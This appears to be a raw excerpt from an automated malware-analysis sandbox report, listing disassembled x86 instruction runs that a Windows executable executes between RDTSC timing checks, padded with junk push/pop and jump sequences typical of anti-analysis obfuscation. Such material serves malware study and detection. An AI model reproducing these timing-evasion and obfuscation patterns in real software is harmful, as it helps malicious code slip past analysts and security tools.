Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB00C7 second address: 7AB013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F19CD112F6Dh 0x00000015 add cx, 0446h 0x0000001a jmp 00007F19CD112F71h 0x0000001f popfd 0x00000020 mov di, si 0x00000023 popad 0x00000024 sub esp, 18h 0x00000027 jmp 00007F19CD112F6Ah 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F19CD112F6Eh 0x00000034 sub ah, 00000018h 0x00000037 jmp 00007F19CD112F6Bh 0x0000003c popfd 0x0000003d mov edi, eax 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov cx, 671Dh 0x00000048 push esi 0x00000049 pop edx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB013A second address: 7AB01C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c mov di, E066h 0x00000010 pop ebx 0x00000011 pushfd 0x00000012 jmp 00007F19CCBA87BCh 0x00000017 or al, FFFFFFD8h 0x0000001a jmp 00007F19CCBA87BBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebx, dword ptr [eax+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F19CCBA87BBh 0x0000002d adc cl, FFFFFF9Eh 0x00000030 jmp 00007F19CCBA87C9h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F19CCBA87C0h 0x0000003c sbb eax, 4AB09598h 0x00000042 jmp 00007F19CCBA87BBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB01C5 second address: 7AB01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F19CD112F6Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB01F8 second address: 7AB0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0214 second address: 7AB021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB021A second address: 7AB0234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0234 second address: 7AB0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0238 second address: 7AB024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB024B second address: 7AB0251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0251 second address: 7AB0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0255 second address: 7AB02C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [74E806ECh] 0x0000000e jmp 00007F19CD112F77h 0x00000013 test esi, esi 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 mov ax, 39B7h 0x0000001c popad 0x0000001d jne 00007F19CD113DA8h 0x00000023 pushad 0x00000024 mov ch, A8h 0x00000026 pushfd 0x00000027 jmp 00007F19CD112F75h 0x0000002c adc esi, 47EC7A16h 0x00000032 jmp 00007F19CD112F71h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB02C3 second address: 7AB02C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB02C7 second address: 7AB02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB02CD second address: 7AB0360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 1902h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F19CCBA87C6h 0x00000012 and ecx, 09A52898h 0x00000018 jmp 00007F19CCBA87BBh 0x0000001d popfd 0x0000001e jmp 00007F19CCBA87C8h 0x00000023 popad 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 call 00007F19CCBA87BEh 0x0000002b mov ah, 13h 0x0000002d pop edx 0x0000002e jmp 00007F19CCBA87BCh 0x00000033 popad 0x00000034 call dword ptr [74E50B60h] 0x0000003a mov eax, 750BE5E0h 0x0000003f ret 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov ecx, edx 0x00000045 jmp 00007F19CCBA87C9h 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0360 second address: 7AB0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0370 second address: 7AB0397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F19CCBA87C0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0397 second address: 7AB039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB039D second address: 7AB03AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB03AE second address: 7AB03BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB03BF second address: 7AB03C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB03C5 second address: 7AB03C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB03C9 second address: 7AB0437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F19CCBA87C2h 0x00000010 adc ah, 00000008h 0x00000013 jmp 00007F19CCBA87BBh 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F19CCBA87C8h 0x0000001f jmp 00007F19CCBA87C5h 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esp], edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F19CCBA87BDh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0437 second address: 7AB0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0454 second address: 7AB0458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0458 second address: 7AB045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB04A3 second address: 7AB04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB04A7 second address: 7AB04AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB04AD second address: 7AB04D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB04D0 second address: 7AB04D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB04D7 second address: 7AB0509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 7CF4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F19CCBA87C4h 0x00000016 pop eax 0x00000017 jmp 00007F19CCBA87BBh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0509 second address: 7AB0521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0521 second address: 7AB059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1A39EF7935h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov si, bx 0x00000013 mov ebx, 417594AAh 0x00000018 popad 0x00000019 mov dx, 5176h 0x0000001d popad 0x0000001e mov eax, 00000000h 0x00000023 jmp 00007F19CCBA87BAh 0x00000028 mov dword ptr [esi], edi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F19CCBA87BEh 0x00000031 add eax, 31124E98h 0x00000037 jmp 00007F19CCBA87BBh 0x0000003c popfd 0x0000003d jmp 00007F19CCBA87C8h 0x00000042 popad 0x00000043 mov dword ptr [esi+04h], eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F19CCBA87BAh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB059C second address: 7AB05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB05AB second address: 7AB05B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB05B1 second address: 7AB05B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB05B5 second address: 7AB05EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F19CCBA87C8h 0x00000014 or ch, FFFFFFB8h 0x00000017 jmp 00007F19CCBA87BBh 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB05EE second address: 7AB06A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19CD112F6Bh 0x00000009 add ecx, 6EDDE77Eh 0x0000000f jmp 00007F19CD112F79h 0x00000014 popfd 0x00000015 mov ecx, 02BC9DC7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+0Ch], eax 0x00000020 pushad 0x00000021 jmp 00007F19CD112F78h 0x00000026 call 00007F19CD112F72h 0x0000002b pushfd 0x0000002c jmp 00007F19CD112F72h 0x00000031 sbb eax, 7EC0EC08h 0x00000037 jmp 00007F19CD112F6Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+4Ch] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F19CD112F70h 0x0000004b and eax, 17430E68h 0x00000051 jmp 00007F19CD112F6Bh 0x00000056 popfd 0x00000057 mov dx, ax 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB06A7 second address: 7AB0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f call 00007F19CCBA87C8h 0x00000014 jmp 00007F19CCBA87C2h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [ebx+50h] 0x0000001e jmp 00007F19CCBA87C1h 0x00000023 mov dword ptr [esi+14h], eax 0x00000026 jmp 00007F19CCBA87BEh 0x0000002b mov eax, dword ptr [ebx+54h] 0x0000002e jmp 00007F19CCBA87C0h 0x00000033 mov dword ptr [esi+18h], eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F19CCBA87BEh 0x0000003d adc al, 00000018h 0x00000040 jmp 00007F19CCBA87BBh 0x00000045 popfd 0x00000046 mov dx, si 0x00000049 popad 0x0000004a mov eax, dword ptr [ebx+58h] 0x0000004d pushad 0x0000004e pushad 0x0000004f call 00007F19CCBA87BDh 0x00000054 pop eax 0x00000055 mov ax, dx 0x00000058 popad 0x00000059 popad 0x0000005a mov dword ptr [esi+1Ch], eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F19CCBA87C6h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0783 second address: 7AB0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0789 second address: 7AB078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB078D second address: 7AB07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b pushad 0x0000000c jmp 00007F19CD112F6Fh 0x00000011 mov bl, ah 0x00000013 popad 0x00000014 mov dword ptr [esi+20h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07B4 second address: 7AB07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07B8 second address: 7AB07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07BC second address: 7AB07C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07C2 second address: 7AB07C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07C8 second address: 7AB07CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB07CC second address: 7AB0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f mov eax, 06DFF1F3h 0x00000014 pushfd 0x00000015 jmp 00007F19CD112F78h 0x0000001a jmp 00007F19CD112F75h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+24h], eax 0x00000024 jmp 00007F19CD112F6Eh 0x00000029 mov eax, dword ptr [ebx+64h] 0x0000002c jmp 00007F19CD112F70h 0x00000031 mov dword ptr [esi+28h], eax 0x00000034 jmp 00007F19CD112F70h 0x00000039 mov eax, dword ptr [ebx+68h] 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F19CD112F6Eh 0x00000043 and si, 4AE8h 0x00000048 jmp 00007F19CD112F6Bh 0x0000004d popfd 0x0000004e mov ecx, 65B242DFh 0x00000053 popad 0x00000054 mov dword ptr [esi+2Ch], eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F19CD112F71h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0893 second address: 7AB0937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19CCBA87C7h 0x00000009 jmp 00007F19CCBA87C3h 0x0000000e popfd 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ax, word ptr [ebx+6Ch] 0x00000019 pushad 0x0000001a mov edx, 6AFA3484h 0x0000001f pushfd 0x00000020 jmp 00007F19CCBA87BDh 0x00000025 and cx, CBC6h 0x0000002a jmp 00007F19CCBA87C1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov word ptr [esi+30h], ax 0x00000035 jmp 00007F19CCBA87BEh 0x0000003a mov ax, word ptr [ebx+00000088h] 0x00000041 jmp 00007F19CCBA87C0h 0x00000046 mov word ptr [esi+32h], ax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007F19CCBA87BDh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0937 second address: 7AB093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB093C second address: 7AB0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0941 second address: 7AB09B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+0000008Ch] 0x00000010 jmp 00007F19CD112F75h 0x00000015 mov dword ptr [esi+34h], eax 0x00000018 jmp 00007F19CD112F6Eh 0x0000001d mov eax, dword ptr [ebx+18h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov esi, edx 0x00000025 pushfd 0x00000026 jmp 00007F19CD112F79h 0x0000002b sbb ecx, 1A7797F6h 0x00000031 jmp 00007F19CD112F71h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB09B2 second address: 7AB09B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB09B8 second address: 7AB09BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB09BC second address: 7AB09FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b jmp 00007F19CCBA87BFh 0x00000010 mov eax, dword ptr [ebx+1Ch] 0x00000013 pushad 0x00000014 mov si, 4AEBh 0x00000018 jmp 00007F19CCBA87C0h 0x0000001d popad 0x0000001e mov dword ptr [esi+3Ch], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cx, bx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB09FB second address: 7AB0A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0A0A second address: 7AB0A60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e jmp 00007F19CCBA87BEh 0x00000013 mov dword ptr [esi+40h], eax 0x00000016 jmp 00007F19CCBA87C0h 0x0000001b lea eax, dword ptr [ebx+00000080h] 0x00000021 pushad 0x00000022 mov esi, 559C1ABDh 0x00000027 push eax 0x00000028 push edx 0x00000029 mov ecx, 5577595Fh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0A60 second address: 7AB0ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push 00000001h 0x00000007 jmp 00007F19CD112F71h 0x0000000c nop 0x0000000d jmp 00007F19CD112F6Eh 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F19CD112F71h 0x00000019 jmp 00007F19CD112F70h 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F19CD112F6Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0ABA second address: 7AB0AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0AC9 second address: 7AB0ACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0ACF second address: 7AB0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0AD3 second address: 7AB0AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0AED second address: 7AB0AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0AF1 second address: 7AB0AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0B75 second address: 7AB0BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, B514h 0x00000007 mov cx, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F19CCBA87C0h 0x00000016 adc ecx, 7B8B2CC8h 0x0000001c jmp 00007F19CCBA87BBh 0x00000021 popfd 0x00000022 popad 0x00000023 test edi, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0BB1 second address: 7AB0BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 7AB0BB5 second address: 7AB0BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
